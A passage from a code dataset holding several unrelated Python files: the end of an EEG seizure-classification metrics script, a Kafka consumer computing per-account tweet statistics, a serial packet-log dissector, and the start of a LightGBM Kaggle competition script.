F1_perc_av.append(mn)\n F1_perc_std.append(st)\n F1_perc_med.append(med)\n F1_perc_range.append([rmin, rmax]) \n\n print('detection delay: ')\n mn, st, med, rmax, rmin = af.print_summary_statistics(detection_delay_final, Zdsn)\n dd_perc_av.append(mn)\n dd_perc_std.append(st)\n dd_perc_med.append(med)\n dd_perc_range.append([rmin, rmax])\n \n # np.set_printoptions(precision=3)\n # print(\"# detection sensitivity: \")\n # print('sens = ' + str(np.array(det_sens_perc_av)))\n # print('sens_std = ' + str(np.array(det_sens_perc_std)))\n # print('sens_med = ' + str(np.array(det_sens_perc_med)))\n # print('sens_range = ' + str(np.array(det_sens_perc_range)))\n\n # print(\"# FP rate: \")\n # print('FP = ' + str(np.array(FP_perc_av)))\n # print('FP_std = ' + str(np.array(FP_perc_std)))\n # print('FP_med = ' + str(np.array(FP_perc_med)))\n # print('FP_range = ' + str(np.array(FP_perc_range)))\n\n # print(\"# PPV: \")\n # print('PPV = ' + str(np.array(PPV_perc_av)))\n # print('PPV_std = ' + str(np.array(PPV_perc_std)))\n # print('PPV_med = ' + str(np.array(PPV_perc_med)))\n # print('PPV_range = ' + str(np.array(PPV_perc_range)))\n\n # print(\"# F1: \")\n # print('F1 = ' + str(np.array(F1_perc_av)))\n # print('F1_std = ' + str(np.array(F1_perc_std)))\n # print('F1_med = ' + str(np.array(F1_perc_med)))\n # print('F1_range = ' + str(np.array(F1_perc_range)))\n\n # print(\"# percent removed: \")\n # print('perc_removed = ' + str(np.array(perc_removed_arr)))\n\n # print(\"# detection delay: \")\n # print('dd = ' + str(np.array(dd_perc_av)))\n # print('dd_std = ' + str(np.array(dd_perc_std)))\n # print('dd_med = ' + str(np.array(dd_perc_med)))\n # print('dd_range = ' + str(np.array(dd_perc_range)))\n\n # add the 0% performance to the array\n perc_removed_arr = [0] + list(perc_removed_arr)\n if AIMII_SVM_MODEL:\n if not TRUST_SCORE_FILTERING:\n # sensitivity\n det_sens_perc_av = [0.830] + list(det_sens_perc_av)\n det_sens_perc_std = [0.300] + list(det_sens_perc_std)\n det_sens_perc_med = [1] + list(det_sens_perc_med)\n det_sens_perc_range = [[0, 1]] + list(det_sens_perc_range)\n # FP rate\n FP_perc_av = [17.2] + list(FP_perc_av)\n FP_perc_std = [21.0] + list(FP_perc_std)\n FP_perc_med = [9.54] + list(FP_perc_med)\n FP_perc_range = [[0.26, 98.2]] + list(FP_perc_range)\n # PPV\n PPV_perc_av = [0.126] + list(PPV_perc_av)\n PPV_perc_std = [0.174] + list(PPV_perc_std)\n PPV_perc_med = [0.055555] + list(PPV_perc_med)\n 
PPV_perc_range = [[0, 0.875]] + list(PPV_perc_range)\n # F1\n F1_perc_av = [0.183] + list(F1_perc_av)\n F1_perc_std = [0.203] + list(F1_perc_std)\n F1_perc_med = [0.105] + list(F1_perc_med)\n F1_perc_range = [[0, 0.875]] + list(F1_perc_range)\n # detection delay\n dd_perc_av = [21.6] + list(dd_perc_av)\n dd_perc_std = [17.4] + list(dd_perc_std)\n dd_perc_med = [16.875] + list(dd_perc_med)\n dd_perc_range = [[1, 89]] + list(dd_perc_range)\n else:\n # sensitivity\n det_sens_perc_av = [0.819] + list(det_sens_perc_av)\n det_sens_perc_std = [0.325] + list(det_sens_perc_std)\n det_sens_perc_med = [1] + list(det_sens_perc_med)\n det_sens_perc_range = [[0, 1]] + list(det_sens_perc_range)\n # FP rate\n FP_perc_av = [10.6] + list(FP_perc_av)\n FP_perc_std = [14.6] + list(FP_perc_std)\n FP_perc_med = [5.3] + list(FP_perc_med)\n FP_perc_range = [[0, 75.8]] + list(FP_perc_range)\n # PPV\n PPV_perc_av = [0.203] + list(PPV_perc_av)\n PPV_perc_std = [0.239] + list(PPV_perc_std)\n PPV_perc_med = [0.125] + list(PPV_perc_med)\n PPV_perc_range = [[0, 1]] + list(PPV_perc_range)\n # F1\n F1_perc_av = [0.277] + list(F1_perc_av)\n F1_perc_std = [0.271] + list(F1_perc_std)\n F1_perc_med = [0.166666] + list(F1_perc_med)\n F1_perc_range = [[0, 1]] + list(F1_perc_range)\n # detection delay\n dd_perc_av = [22.2] + list(dd_perc_av)\n dd_perc_std = [18.0] + list(dd_perc_std)\n dd_perc_med = [16.4] + list(dd_perc_med)\n dd_perc_range = [[2, 90]] + list(dd_perc_range)\n else:\n if TRUST_SCORE_FILTERING:\n # sensitivity\n det_sens_perc_av = [0.704] + list(det_sens_perc_av)\n det_sens_perc_std = [0.387] + list(det_sens_perc_std)\n det_sens_perc_med = [1] + list(det_sens_perc_med)\n det_sens_perc_range = [[0, 1]] + list(det_sens_perc_range)\n # FP rate\n FP_perc_av = [2.2] + list(FP_perc_av)\n FP_perc_std = [4.46] + list(FP_perc_std)\n FP_perc_med = [0.576] + list(FP_perc_med)\n FP_perc_range = [[0, 23.6]] + list(FP_perc_range)\n # PPV\n PPV_perc_av = [0.504] + list(PPV_perc_av)\n PPV_perc_std = [0.408] + list(PPV_perc_std)\n PPV_perc_med = [0.3333] + list(PPV_perc_med)\n PPV_perc_range = [[0, 1]] + list(PPV_perc_range)\n # F1\n F1_perc_av = [0.517] + list(F1_perc_av)\n F1_perc_std = [0.370] + list(F1_perc_std)\n F1_perc_med = [0.5] + list(F1_perc_med)\n F1_perc_range = [[0, 1]] + list(F1_perc_range)\n # detection delay\n dd_perc_av = [21.3] + list(dd_perc_av)\n dd_perc_std = [11.9] + list(dd_perc_std)\n dd_perc_med = [19.7] + list(dd_perc_med)\n dd_perc_range = [[3, 56]] + list(dd_perc_range)\n else:\n # sensitivity\n det_sens_perc_av = [0.641] + list(det_sens_perc_av)\n det_sens_perc_std = [0.415] + list(det_sens_perc_std)\n det_sens_perc_med = [1] + list(det_sens_perc_med)\n det_sens_perc_range = [[0, 1]] + list(det_sens_perc_range)\n # FP rate\n FP_perc_av = [2.9] + list(FP_perc_av)\n FP_perc_std = [5.6] + list(FP_perc_std)\n FP_perc_med = [1.2] + list(FP_perc_med)\n FP_perc_range = [[0, 31.5]] + list(FP_perc_range)\n # PPV\n PPV_perc_av = [0.389] + list(PPV_perc_av)\n PPV_perc_std = [0.389] + list(PPV_perc_std)\n PPV_perc_med = [0.231] + list(PPV_perc_med)\n PPV_perc_range = [[0, 1]] + list(PPV_perc_range)\n # F1\n F1_perc_av = [0.397] + list(F1_perc_av)\n F1_perc_std = [0.342] + list(F1_perc_std)\n F1_perc_med = [0.316] + list(F1_perc_med)\n F1_perc_range = [[0, 1]] + list(F1_perc_range)\n # detection delay\n dd_perc_av = [22.1] + list(dd_perc_av)\n dd_perc_std = [13.2] + list(dd_perc_std)\n dd_perc_med = [19.3] + list(dd_perc_med)\n dd_perc_range = [[2, 55]] + list(dd_perc_range)\n\n\n final_array_results = 
'/result_arrays/'\n\n if SVM_DISTANCES:\n str_save_1 = '_svm_'\n else:\n str_save_1 = '_trust_'\n if REMOVE_ONLY_NOSEIZURE:\n str_save_2 = 'noseize_'\n else:\n str_save_2 = 'all_'\n if SAME_PERCENTILE:\n str_save_3 = 'perc_'\n else:\n str_save_3 = 'thres_'\n if AIMII_SVM_MODEL:\n str_save_4 = str(p_low_trust) + '_aimII'\n else:\n str_save_4 = str(p_low_trust) # + '_' + str(a_temp_scaling)\n if TRAIN_LABELS_TRUST:\n str_save_4 = str_save_4 + '_trust_aimIItrain'\n str_save_5 = '_wtrust'\n\n\n # uncomment this for counting the number and average length of the deferred segments\n perc_removed_str = 'perc_removed_nseg_' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # seg_length mean str\n seg_mean_str = 'seg' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # seg_length std str\n seg_std_str = 'seg_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # n_seg string\n seg_number_str = 'nseg_' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n af.save_with(final_array_results + perc_removed_str, perc_removed_arr)\n af.save_with(final_array_results + seg_mean_str, mean_seg_length)\n af.save_with(final_array_results + seg_std_str, std_seg_length)\n af.save_with(final_array_results + seg_number_str, n_seg_per_day)\n\n\n if TRUST_SCORE_FILTERING:\n perc_removed_str = 'perc_removed' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n # mean str\n sens_mean_str = 'sens' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fprate_mean_str = 'FPrate' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fone_mean_str = 'F1' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n ppv_mean_str = 'PPV' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n det_delay_mean_str = 'ddelay' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n # std str\n sens_std_str = 'sens_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fprate_std_str = 'FPrate_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fone_std_str = 'F1_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n ppv_std_str = 'PPV_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n det_delay_std_str = 'ddelay_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n # median str\n sens_med_str = 'sens_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fprate_med_str = 'FPrate_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fone_med_str = 'F1_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n ppv_med_str = 'PPV_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n det_delay_med_str = 'ddelay_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n # range str\n sens_range_str = 'sens_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fprate_range_str = 'FPrate_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n fone_range_str = 'F1_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n ppv_range_str = 'PPV_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n det_delay_range_str = 'ddelay_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + str_save_5 + '.npy'\n 
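# Editor's note: the else-branch below repeats the naming scheme above without the '_wtrust'\n # suffix, i.e. for runs where trust-score filtering is disabled.\n 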
else:\n perc_removed_str = 'perc_removed' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # mean str\n sens_mean_str = 'sens' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fprate_mean_str = 'FPrate' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fone_mean_str = 'F1' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n ppv_mean_str = 'PPV' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n det_delay_mean_str = 'ddelay' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # std str\n sens_std_str = 'sens_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fprate_std_str = 'FPrate_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fone_std_str = 'F1_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n ppv_std_str = 'PPV_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n det_delay_std_str = 'ddelay_std' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # median str\n sens_med_str = 'sens_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fprate_med_str = 'FPrate_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fone_med_str = 'F1_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n ppv_med_str = 'PPV_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n det_delay_med_str = 'ddelay_med' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n # range str\n sens_range_str = 'sens_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fprate_range_str = 'FPrate_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n fone_range_str = 'F1_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n ppv_range_str = 'PPV_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n det_delay_range_str = 'ddelay_range' + str_save_1 + str_save_2 + str_save_3 + str_save_4 + '.npy'\n\n # CHANGE\n # af.save_with(final_array_results + perc_removed_str, perc_removed_arr)\n # # mean arrays\n # af.save_with(final_array_results + sens_mean_str, det_sens_perc_av)\n # af.save_with(final_array_results + fprate_mean_str, FP_perc_av)\n # af.save_with(final_array_results + fone_mean_str, F1_perc_av)\n # af.save_with(final_array_results + ppv_mean_str, PPV_perc_av)\n # af.save_with(final_array_results + det_delay_mean_str, dd_perc_av)\n # # std arrays\n # af.save_with(final_array_results + sens_std_str, det_sens_perc_std)\n # af.save_with(final_array_results + fprate_std_str, FP_perc_std)\n # af.save_with(final_array_results + fone_std_str, F1_perc_std)\n # af.save_with(final_array_results + ppv_std_str, PPV_perc_std)\n # af.save_with(final_array_results + det_delay_std_str, dd_perc_std)\n # # median arrays\n # af.save_with(final_array_results + sens_med_str, det_sens_perc_med)\n # af.save_with(final_array_results + fprate_med_str, FP_perc_med)\n # af.save_with(final_array_results + fone_med_str, F1_perc_med)\n # af.save_with(final_array_results + ppv_med_str, PPV_perc_med)\n # af.save_with(final_array_results + det_delay_med_str, dd_perc_med)\n # # range arrays\n # af.save_with(final_array_results + sens_range_str, det_sens_perc_range)\n # af.save_with(final_array_results + fprate_range_str, FP_perc_range)\n # af.save_with(final_array_results + fone_range_str, F1_perc_range)\n # af.save_with(final_array_results + ppv_range_str, PPV_perc_range)\n # af.save_with(final_array_results + det_delay_range_str, dd_perc_range)\n\n time_end_all = 
time.time()\n print(\"total calculation time: \" + \"%.2f\" % ((time_end_all - time_start_all) / 60.) + ' minutes')\n print('')\n","repo_name":"thijsrmbecker/classify_w_deferral_seizure","sub_path":"classification_w_deferral/classify_w_defer_function.py","file_name":"classify_w_defer_function.py","file_ext":"py","file_size_in_byte":39806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19546948401","text":"import json\nfrom json import loads\nimport datetime \n\nfrom kafka import KafkaConsumer, TopicPartition\n\nfrom upload_data import upload\n\n\ndata = {}\n\ndef main():\n consumer = KafkaConsumer(\n bootstrap_servers=[':9092', ':9092', ':9092'],\n auto_offset_reset='earliest',\n enable_auto_commit=True)\n\n resubscribe(consumer)\n\n try:\n all_accounts = get_all_acounts(consumer)\n\n data['accounts'] = []\n data['accounts'].append(list(all_accounts))\n print(\"get_all_acounts LOADED\")\n except Exception as e:\n print(\"get_all_acounts FAILED\")\n print(e)\n\n\n try:\n get_tweets_for_top_10_accounts(consumer) \n print(\"get_tweets_for_top_10_accounts LOADED\")\n except Exception as e:\n print(\"get_tweets_for_top_10_accounts FAILED\")\n print(e)\n\n try:\n get_top_20_accounts(consumer,1)\n print(\"get_top_20_accounts LOADED\")\n except Exception as e:\n print(\"get_top_20_accounts FAILED\")\n print(e)\n \n try:\n get_aggregated_statistics(consumer)\n print(\"get_aggregated_statistics LOADED\")\n except Exception as e:\n print(\"get_aggregated_statistics FAILED\")\n print(e)\n\n with open('data.json', 'w') as outfile:\n json.dump(data, outfile)\n\n #upload('data.json')\n\n consumer.close()\n\n\ndef resubscribe(consumer):\n all_topics = consumer.topics()\n consumer.subscribe(topics=list(all_topics))\n\n\ndef get_all_acounts(consumer):\n all_topics = consumer.topics()\n\n return all_topics\n\n\ndef get_tweets_for_top_10_accounts(consumer):\n resubscribe(consumer)\n all_topics = get_all_acounts(consumer)\n\n top10 = []\n start_date = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=3))\n\n for topic in all_topics:\n tp = TopicPartition(topic, 0)\n consumer.seek_to_end(tp)\n last_offset = int(consumer.position(tp))\n\n offset = consumer.offsets_for_times({tp: start_date})\n\n start_offset = 0\n if list(offset.values())[0]:\n start_offset = int(list(offset.values())[0].offset)\n \n\n top10.append({'user_id' : topic, 'amount' : int(last_offset - start_offset), 'length' : last_offset})\n\n\n sorted(top10, key = lambda x: x['amount'])\n top10 = top10[:10]\n\n data['top10_producing_account_latest_tweets'] = []\n\n for topic in top10:\n tp = TopicPartition(topic['user_id'], 0)\n\n if topic['length'] >= 10:\n consumer.seek(tp, topic['length'] - 10)\n else:\n consumer.seek_to_beginning(tp)\n\n messages = consumer.poll(2000,10)\n messages = list(messages.values())\n\n tweets = []\n\n for message in messages:\n tweets.append(message[0].value.decode(\"utf-8\"))\n\n print(tweets)\n\n data['top10_producing_account_latest_tweets'].append(\n {\n 'user_id' : topic['user_id'], \n 'latest_tweets' : tweets\n })\n\n\n \n\n\ndef get_top_20_accounts(consumer, n):\n resubscribe(consumer)\n all_topics = get_all_acounts(consumer)\n\n data[\"top20_producing_accounts\"] = []\n\n top20 = []\n start_date = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=n))\n\n for topic in all_topics:\n tp = TopicPartition(topic, 0)\n consumer.seek_to_end(tp)\n last_offset = int(consumer.position(tp))\n\n offset = 
consumer.offsets_for_times({tp: start_date})\n\n start_offset = 0\n if list(offset.values())[0]:\n start_offset = int(list(offset.values())[0].offset)\n \n\n top20.append({'user_id' : topic, 'amount' : int(last_offset - start_offset)})\n\n\n sorted(top20, key = lambda x: x['amount'])\n top20 = top20[:20]\n\n print(top20)\n \n for account in top20:\n data[\"top20_producing_accounts\"].append(account)\n\ndef get_aggregated_statistics(consumer):\n resubscribe(consumer)\n all_topics = get_all_acounts(consumer)\n data['aggregated_statistics'] = []\n\n hour_before_1 = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=1))\n hour_before_2 = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=1))\n hour_before_3 = datetime.datetime.timestamp(datetime.datetime.now() - datetime.timedelta(hours=3))\n\n for topic in all_topics:\n tp = TopicPartition(topic, 0)\n consumer.seek_to_end(tp)\n last_offset = consumer.position(tp)\n\n offset_1_hour_before = consumer.offsets_for_times({tp: hour_before_1})\n offset_2_hour_before = consumer.offsets_for_times({tp: hour_before_2})\n offset_3_hour_before = consumer.offsets_for_times({tp: hour_before_3})\n\n start_minus_1 = 0\n start_minus_2 = 0\n start_minus_3 = 0\n\n if list(offset_1_hour_before.values())[0]:\n start_minus_1 = list(offset_1_hour_before.values())[0].offset\n\n if list(offset_2_hour_before.values())[0]:\n start_minus_2 = list(offset_2_hour_before.values())[0].offset\n\n if list(offset_3_hour_before.values())[0]:\n start_minus_3 = list(offset_3_hour_before.values())[0].offset\n\n data['aggregated_statistics'].append(\n {\n 'user_id' : topic, \n '1 hour before' : last_offset - start_minus_1, \n '2 hours before' : start_minus_1 - start_minus_2,\n '3 hours before' : start_minus_2 - start_minus_3\n })\n \n \n\nif __name__ == \"__main__\":\n main()\n\n\n\n","repo_name":"yatskivkath/Big-Data-2021-Apache-Kafka","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17339521072","text":"#!/usr/bin/env python3\nimport os\nimport binascii\nimport sys\nimport slotlib\nimport textwrap\nimport struct\nimport time\n# dissects capture logs and outputs a list of packets\ndatastream = []\nprefixes = lambda y: [y[:x] for x in range(1, len(y)+1)]\nrealtime = False\n\nignored_dataids = []\nignored_datastr = os.getenv(\"CAPLOG_IGNORE_IDS\")\nif ignored_datastr:\n ignored_dataids = [int(x, 16) for x in ignored_datastr.split()]\n print(f\"NOTE: ignoring data ids {', '.join(hex(x) for x in ignored_dataids)}\")\n\ncsum_trailer = 0\nif os.getenv(\"CAPLOG_NO_CSUM\"):\n csum_trailer = 0\n\nif len(sys.argv) < 3:\n print(\"usage: {} [logicexport,simlog,realtime] \")\n exit(1)\n\nif sys.argv[1] in prefixes(\"logicexport\"):\n with open(sys.argv[2]) as f:\n f.readline()\n flag = False\n\n for i in f.readlines():\n i = i.rstrip('\\n')\n row = i.split(',')\n\n if row[2] or row[3]: continue\n v = int(row[1][2:], base=16)\n if not flag and v not in (0xa6, 0xa5):\n continue\n flag = True\n datastream.append(v)\nelif sys.argv[1] in prefixes(\"simlog\"):\n with open(sys.argv[2], 'rb') as f:\n datastream = [x for x in f.read()]\nelif sys.argv[1] in prefixes(\"realtime\"):\n realtime = True\nelse:\n print(\"usage: {} [logicexport,simlog,realtime] \")\n exit(1)\n\nptr = 0\nif not realtime:\n def read_buf(x):\n global ptr\n ptr += x\n if ptr > len(datastream):\n exit()\n return 
bytes(datastream[ptr-x:ptr])\n\n def read():\n header = bytearray(read_buf(3))\n while header[0] not in (0xa5, 0xa6):\n header[0:1] = header[1:2]\n header[2] = read_buf(1)[0]\n yield bytes(header) + read_buf(header[1]+csum_trailer)\nelse:\n files = [open(x, 'rb') for x in sys.argv[2:]]\n import select\n\n def read_exact(f, x):\n buf = bytearray()\n while len(buf) < x:\n buf += os.read(f.fileno(), x-len(buf))\n if len(buf) < x: time.sleep(0.01)\n return buf\n \n def read():\n (ok, _, _) = select.select(files, [], [])\n for f in ok:\n header = read_exact(f, 3)\n while header[0] not in (0xa5, 0xa6):\n print(\"??? : {:02x}\".format(header[0]))\n header[0:1] = header[1:2]\n header[2] = read_exact(f, 1)[0]\n yield bytes(header + read_exact(f, header[1]+csum_trailer))\n\npnames = {\n 0x10: \"HANDSHAKE_INIT\",\n 0x11: \"HANDSHAKE_RESP\",\n 0x12: \"HANDSHAKE_OK\",\n 0x13: \"HANDSHAKE_UOK\",\n 0x20: \"DATA_TEMP\",\n 0x21: \"DATA_FULFILL\",\n 0x22: \"DATA_RETRIEVE\",\n 0x23: \"DATA_REQUEST\",\n 0x24: \"DATA_SET_SIZE\",\n 0x25: \"DATA_STORE\",\n 0x30: \"ACK_DATA_TEMP\",\n 0x31: \"ACK_DATA_FULFILL\",\n 0x32: \"ACK_DATA_RETRIEVE\",\n 0x33: \"ACK_DATA_REQUEST\",\n 0x34: \"ACK_DATA_SET_SIZE\",\n 0x35: \"ACK_DATA_STORE\",\n 0x40: \"QUERY_TIME\",\n 0x50: \"RESET\",\n 0x51: \"PING\",\n 0x52: \"PONG\",\n 0x60: \"UPDATE_CMD\",\n 0x61: \"UPDATE_IMG_DATA\",\n 0x62: \"UPDATE_IMG_START\",\n 0x63: \"UPDATE_STATUS\",\n 0x70: \"CONSOLE_MSG\",\n 0x80: \"REFRESH_GRABBER\",\n 0x81: \"SLEEP_ENABLE\"\n}\n\npktcolors = {\n \"HANDSHAKE\": 82,\n \"QUERY_TIME\": 225,\n \"PING\": 245,\n \"PONG\": 245,\n \"RESET\": 226,\n \"CONSOLE\": 238,\n \"DATA_TEMP\": 93,\n \"DATA_SET_SIZE\": 93,\n \"DATA_FULFILL\": 45,\n \"DATA_REQUEST\": 101,\n \"DATA_STORE\": 196,\n \"DATA_RETRIEVE\": 208\n}\n\nheader_width = 5 + 2 + 2 + 2 + 2 + 20 + 2\n\ntempcodes = {\n 0b11: \"Hot\",\n 0b10: \"Warm\",\n 0b01: \"ColdWantsWarm\",\n 0b00: \"Cold\"\n}\n\nslot_temps = {}\nslot_databufs = {}\n\njust_restarted = True\n\ndef data_temp(dat, from_esp):\n slotid, tempcode = struct.unpack(\"= 512:\n print(textwrap.indent(st.get_formatted(st.parse(slot_databufs[slotid]), (offs + len(dat) - 6 - totalupd), (offs + len(dat) - 6)), ' ' * (header_width + 2) + '└'))\n else:\n print(textwrap.indent(st.get_formatted(st.parse(slot_databufs[slotid])), ' ' * (header_width + 2) + '└'))\n\nupdrescode = {\n 0: \"Ok\",\n 1: \"NotEnoughSpace_TryAgain\",\n 2: \"NotEnoughSpace_Failed\",\n 0x10: \"IllegalState\",\n 0x11: \"NAK\",\n 0xff: \"Timeout\"\n}\n\ndef ack_data_update(dat, from_esp, is_move):\n slotid, upds, updl, code = struct.unpack(\" totallen:\n slot_databufs[slotid] = slot_databufs[slotid][:totallen]\n else:\n slot_databufs[slotid] += bytearray(totallen - len(slot_databufs[slotid]))\n \n print(f\": data size change for {slotid:03x} ({slotlib.slot_types[slotid][0]}) to {totallen} (0x{totallen:04x})\")\n\ndef ack_data_chsize(dat, from_esp):\n slotid, totallen = struct.unpack(\" 0.05:\n if delta < 2:\n print(\" +{}ms\".format(int(delta*1000)))\n else:\n print(\" +{:.02f}s\".format(delta))\n\n\n if pkt[2] in pnames:\n for j, i in pktcolors.items():\n if j in pnames[pkt[2]]:\n print('\\x1b[38;5;{}m'.format(i), end=\"\")\n if \"ACK\" in pnames[pkt[2]]:\n print('\\x1b[1m', end=\"\")\n\n if pkt[0] == 0xa6:\n print('E->S ', end='')\n elif pkt[0] == 0xa5:\n print('S->E ', end='')\n else:\n print(' UNK ', end='')\n\n if pkt[2] not in pnames:\n print(f\": {pkt[0]:02x}{pkt[1]:02x}{pkt[2]:02x} \")\n continue\n\n print(\": 0x{:02x} ({:20}) \\x1b[0m\".format(pkt[2], pnames[pkt[2]]), 
end=\"\")\n\n\n if pkt[1] == 0x00:\n print()\n continue\n if pkt[1] == 0x01 and pkt[2] not in phandle:\n print(\": {:02x}\".format(pkt[3]))\n else:\n if pkt[2] in phandle:\n try:\n phandle[pkt[2]](pkt[3:], pkt[0] == 0xa6)\n except:\n print(\"error decoding \" + binascii.hexlify(pkt[3:]).decode(\"ascii\"))\n else:\n print(\"? \" + binascii.hexlify(pkt[3:]).decode(\"ascii\"))\n","repo_name":"mincrmatt12/MSign","sub_path":"caplog/dissect.py","file_name":"dissect.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"7067766770","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.metrics import roc_auc_score\n\nimport lightgbm as lgb\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport warnings\n# warnings.simplefilter(action='ignore', category=FutureWarning)\nwarnings.filterwarnings('ignore')\n\nplt.style.use('seaborn')\nsns.set(font_scale=1)\n\nrandom_state = 0\nnp.random.seed(random_state)\ntrain_df = pd.read_csv('./train.csv')\ntest_df = pd.read_csv('./test.csv')\n\ntest_val = test_df.drop(['ID_code'], axis=1).values\nunique_samples = []\n\n# For each feature, identify the unique values in test_df\nunique_count = np.zeros_like(test_val)\nfor feature in range(test_val.shape[1]):\n _, index, count = np.unique(test_val[:, feature], return_counts=True,\n return_index=True)\n unique_count[index[count == 1], feature] += 1\n\n# Samples in test that have unique values are real, the others are fake\n# The fake data is not taken into account for the evaluation of n_occurrences\nreal_samples_indexes = np.argwhere(np.sum(unique_count, axis=1) > 0)[:, 0]\nsynthetic_samples_indexes = \\\n np.argwhere(np.sum(unique_count, axis=1) == 0)[:, 0]\n\nprint(f'There are {len(real_samples_indexes)} real test samples.')\nprint(f'There are {len(synthetic_samples_indexes)} synthetic test samples.')\nreal_test_df = test_df.iloc[real_samples_indexes]\n\nfeatures = [c for c in train_df.columns if c not in ['target', 'ID_code']]\n\ndata_df = pd.concat([train_df, real_test_df], ignore_index=True)\n\n# feature engineering:\n# use the distribution of occurrences of distinct values for each feature\n# A new feature is defined for each original feature:\n# var -> occ_var = n. 
of occurrences of corresponding value in the whole set\nfor var in features:\n feature = data_df[var]\n n_occurrences = feature.value_counts()[feature].values\n train_df['occ_' + var] = n_occurrences[:len(train_df)]\n test_occ = np.zeros(len(test_df))\n test_occ[real_samples_indexes] = n_occurrences[-len(real_test_df):]\n test_df['occ_' + var] = test_occ\n\n\noriginal_features = features\nfeatures = [c for c in train_df.columns if c not in ['target', 'ID_code']]\n\n\nlgb_params = {\n \"objective\": \"binary\",\n \"metric\": \"auc\",\n \"boosting\": 'gbdt',\n \"max_depth\": -1,\n \"num_leaves\": 13,\n \"learning_rate\": 0.01,\n # \"bagging_freq\": 5,\n # \"bagging_fraction\": 0.4,\n # \"feature_fraction\": 0.05,\n # use 1.0 with the new features!!\n \"feature_fraction\": 1.0,\n \"min_data_in_leaf\": 80,\n \"min_sum_hessian_in_leaf\": 10,\n \"tree_learner\": \"serial\",\n \"boost_from_average\": \"false\",\n # \"lambda_l1\": 5,\n # \"lambda_l2\": 5,\n \"bagging_seed\": random_state,\n \"verbosity\": 1,\n \"seed\": random_state,\n \"num_threads\": 8\n}\n\nn_splits = 7\nn_loops = 3\nskf = StratifiedKFold(n_splits=n_splits, shuffle=True,\n random_state=random_state)\noof = train_df[['ID_code', 'target']]\noof['predict'] = 0\npredictions = test_df[['ID_code']]\nval_aucs = []\nfeature_importance_df = pd.DataFrame()\n\nX_test = test_df[features]\n\nfor fold, (trn_idx, val_idx) in enumerate(skf.split(train_df,\n train_df['target'])):\n X_train = train_df.iloc[trn_idx][features]\n y_train = train_df.iloc[trn_idx]['target']\n X_valid = train_df.iloc[val_idx][features]\n y_valid = train_df.iloc[val_idx]['target']\n p_valid, p_test = 0, 0\n for i in range(n_loops):\n X_t, y_t = X_train, y_train\n\n 